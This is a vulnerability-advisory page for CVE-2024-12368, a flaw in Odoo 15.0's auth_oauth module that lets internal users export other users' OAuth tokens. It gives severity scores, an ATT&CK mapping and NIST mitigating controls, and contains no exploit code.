Cyber Resilience

CVE-2024-12368

HighPublic PoC

Published: 25 February 2025

Published
25 February 2025
Modified
28 February 2025
KEV Added
Patch
CVSS Score v3.1 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
EPSS Score 0.0006 19.9th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-12368 is a high-severity Improper Access Control (CWE-284) vulnerability in Odoo Odoo. Its CVSS base score is 8.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Steal Application Access Token (T1528); ranked at the 19.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and AC-6 (Least Privilege).

Deeper analysis

CVE-2024-12368 is an improper access control vulnerability (CWE-284) in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0. Published on 2025-02-25, it enables an internal user to export OAuth tokens belonging to other users, earning a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

The vulnerability can be exploited by an authenticated internal user with low privileges over the network, requiring low complexity and no user interaction. Successful exploitation allows the attacker to export OAuth tokens of other users, potentially compromising confidentiality and integrity by granting unauthorized access to external services or resources linked via those tokens.

Mitigation details and patches are discussed in the Odoo GitHub issue at https://github.com/odoo/odoo/issues/193854.

EU & UK References

Vulnerability details

Improper access control in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of other users.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1528 Steal Application Access Token Credential Access
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Why these techniques?

The vulnerability enables authenticated internal users to export other users' OAuth tokens via the export feature due to improper access control, directly facilitating the theft of application access tokens for session hijacking and privilege escalation.

CVEs Like This One

CVE-2024-36259Same product: Odoo Odoo
CVE-2024-35177Shared CWE-284
CVE-2026-48898Shared CWE-284
CVE-2025-29315Shared CWE-284
CVE-2025-55261Shared CWE-284
CVE-2026-39339Shared CWE-284
CVE-2026-28855Shared CWE-284
CVE-2026-46839Shared CWE-284
CVE-2025-27646Shared CWE-284
CVE-2026-25519Shared CWE-284

Affected Assets

odoo
odoo
15.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly enforces approved authorizations for access to system resources like OAuth tokens, preventing unauthorized internal users from exporting tokens belonging to other users.

prevent

Implements least privilege to restrict low-privilege internal users from accessing or exporting OAuth tokens of other users.

prevent

Requires protection of authenticators including OAuth tokens from unauthorized disclosure, mitigating the improper access allowing their export.

References